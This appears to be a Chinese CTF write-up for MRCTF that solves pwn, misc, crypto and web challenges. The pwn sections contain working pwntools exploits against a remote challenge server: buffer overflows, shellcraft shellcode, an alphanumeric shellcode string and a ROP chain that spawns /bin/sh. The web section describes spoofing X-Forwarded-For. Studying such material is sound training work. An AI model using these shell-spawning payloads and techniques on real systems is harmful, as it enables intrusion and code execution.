MRCTF - 部分WP


#pwn Easy_equation

1
if ( 11 * judge * judge + 17 * judge * judge * judge * judge - 13 * judge * judge * judge - 7 * judge == 198 )

solve to get judge = 2 溢出即可,不需绕过判断

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
from pwnlib.util.proc import wait_for_debugger
context.log_level = 'debug'
# a = process("./easy_equation")
elf = ELF("./easy_equation")
a = remote("38.39.244.2", 28089)
# wait_for_debugger(a.pid)
flag_addr = 0x004006D0
payload = 'a' * (1 + 0x8)
payload += p64(flag_addr)
# a.recvuntil(". ")
a.sendline(payload)
a.interactive()

#pwn easyoverflow

保护全开,这一点都不easy 需要保证栈中 rbp - 30h to rbp - 40h is covered by ‘n0t_r3@11y_f1@g’ input is stored in rbp - 70h exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
from pwn import *
from pwnlib.util.proc import wait_for_debugger
context.log_level = 'debug'
# a = process("./easy_overflow")
# elf = ELF("./easy_overflow")
a = remote("38.39.244.2", 28073)
# wait_for_debugger(a.pid)
flag_addr = 0x004006D0
payload = 'a' * (0x70 - 0x40)
payload += 'n0t_r3@11y_f1@g' + p64(0)
# a.recvuntil(". ")
a.sendline(payload)
a.interactive()

#pwn shellcode

再不能更简单了

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
from pwnlib.util.proc import wait_for_debugger
context.log_level = 'debug'
# a = process("./shellcode")
# elf = ELF("./easy_overflow")
a = remote("38.39.244.2", 28071)
# wait_for_debugger(a.pid)
context.arch = "amd64"
flag_addr = 0x004006D0
# a.recvuntil(". ")
a.sendline(asm(shellcraft.sh()))
a.interactive()

#pwn spfa

看看流程答案就出来了,不知道出题人是什么意图 先add,保证第一项为0,然后get flag就可以直接得到答案。 本题有问题,后来修复了。放图聊以纪念

#misc 寻找xxx

看,就硬看,看不出来就去这里

#crypto keyboark

九宫格键盘没得说

#pwn shellcode-revenge

64位可见字符shellcode,地址在rax 为了能够f5,可以先把调用shellcode的代码patch掉 到网上找一个现成的payload

1
jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394c

发现为了保证不read到换行,需要填充,填充符号还有讲究,原shellcode会执行一部分填充字符,因此需要保证填充字符可执行且栈平衡,选取QY填充即可(push rcx,pop rcx)

1
jZTYX4UPXk9AHc49149hJG00X5EB00PXHc1149Hcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQ

这payload看得我密恐都犯了=-=

#misc qctl

套娃压缩包,先写个脚本解压:

1
2
3
4
5
6
7
8
9
10
11
#!/bin/sh
while ((1))
do
name=$(ls out)
if [ ${name##*.}x != 'zip'x ]; then
break
fi
pass=${name%.*}
unar out/$name -o out -p $pass
rm out/$name
done

得到一个txt文件,每一行是一个像素值,一共40000行 二维码是200x200型 再写个脚本把二维码搞出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from PIL import Image
out = Image.new("RGB", (200, 200))
pixels = out.load()
with open("out/qr.txt", 'r') as f:
lines = iter(f.readlines())
for j in range(0, 200):
for i in range(0, 200):
try:
line = next(lines)
if '255' in line:
pixels[i, j] = (255, 255, 255)
else:
pixels[i, j] = (0, 0, 0)
except StopIteration:
break
out.save("out.png")

扫码即得flag

#misc Unravel

解压缩得到一音频,一图片,一加密zip 图片foremost得到密钥,音频尾有AES密文,解密得到zip密码 解压zip得到另一音频 音频LSB隐写,使用SilentEye解决 这工具挺强的,好像各种隐写都可以解决

#web PyWebsite

get flag界面xff伪造成127.0.0.1就好了,提示很明显

#不眠夜之WA

先写个脚本协助拼图

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from PIL import Image
import os
import pandas as pd
import difflib
imgs = os.listdir('.')
img_info = pd.DataFrame(columns=['top', 'left', 'right', 'buttom'], index=[])
for img in imgs:
if 'jpg' not in img:
continue
piece = Image.open(img)
piece.convert('L')
x_max = piece.size[0]
y_max = piece.size[1]
top_str = ''
left_str = ''
right_str = ''
buttom_str = ''
for i in range(0, x_max):
top_str += chr(piece.getpixel((i, 0))[0])
buttom_str += chr(piece.getpixel((i, y_max - 1))[0])
for i in range(0, y_max):
left_str += chr(piece.getpixel((0, i))[0])
right_str += chr(piece.getpixel((x_max - 1, i))[0])
img_info = img_info.append(pd.Series({'top': top_str, 'left': left_str, 'buttom': buttom_str, 'right': right_str}, name=img))
img_info.to_csv('res.csv')
img_combine = pd.DataFrame(columns=['top', 'left', 'right', 'buttom'], index=[])
max_similiar = {
'top': '0',
'buttom': '0',
'left': '0',
'right': '0',
}
def strdiff(str1, str2):
return difflib.SequenceMatcher(None, str1, str2).quick_ratio()
for index1, row1 in img_info.iterrows():
for name in img_info.columns:
for index2, row2 in img_info.iterrows():
if index1 == index2:
continue
if name == 'top':
contrast = 'buttom'
elif name == 'buttom':
contrast = 'top'
elif name == 'left':
contrast = 'right'
elif name == 'right':
contrast = 'left'
if max_similiar[name] == '0' or strdiff(row1[name], row2[contrast]) > strdiff(row1[name], img_info.loc[max_similiar[name], contrast]):
max_similiar[name] = index2
#if strdiff(row1[name], img_info.loc[max_similiar[name], contrast]) < 0.85:
# max_similiar[name] = '0'
img_combine = img_combine.append(pd.Series(max_similiar, name=index1))
img_combine.to_csv('final_res.csv')

该脚本查找每张图片上下左右最有可能匹配的图片,输出样例如下:

1
2
3
4
5
---------------------------------------------
top left right buttom
---------------------------------------------
63.jpg 58.jpg 5.jpg 10.jpg 34.jpg
---------------------------------------------

有辅助还拼了一个小时,以后再也不做拼图了=-=

#nothing but everythin

使用ropgadget工具生成ROP链,从入口点调用函数的参数可以找到main函数的位置,从而确定溢出点 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from pwn import *
from pwnlib.util.proc import wait_for_debugger
#!/usr/bin/env python2
# execve generated by ROPgadget
from struct import pack
# Padding goes here
p = ''
p += pack('<Q', 0x00000000004100d3) # pop rsi ; ret
p += pack('<Q', 0x00000000006b90e0) # @ .data
p += pack('<Q', 0x00000000004494ac) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000047f261) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004100d3) # pop rsi ; ret
p += pack('<Q', 0x00000000006b90e8) # @ .data + 8
p += pack('<Q', 0x0000000000444840) # xor rax, rax ; ret
p += pack('<Q', 0x000000000047f261) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000400686) # pop rdi ; ret
p += pack('<Q', 0x00000000006b90e0) # @ .data
p += pack('<Q', 0x00000000004100d3) # pop rsi ; ret
p += pack('<Q', 0x00000000006b90e8) # @ .data + 8
p += pack('<Q', 0x0000000000449505) # pop rdx ; ret
p += pack('<Q', 0x00000000006b90e8) # @ .data + 8
p += pack('<Q', 0x0000000000444840) # xor rax, rax ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x00000000004746b0) # add rax, 1 ; ret
p += pack('<Q', 0x000000000040123c) # syscall
context.log_level = 'debug'
# a = process("./pwn")
# elf = ELF("./easy_overflow")
a = remote("38.39.244.2", 28047)
# wait_for_debugger(a.pid)
context.arch = "amd64"
payload = 'a' * (0x70 + 0x8)
payload += p
a.sendline()
a.sendline(payload)
a.interactive()

← Prev 非递归汉诺塔 - 实验报告 | 《程序员的自我修养》- 动态链接库基本知识 Next →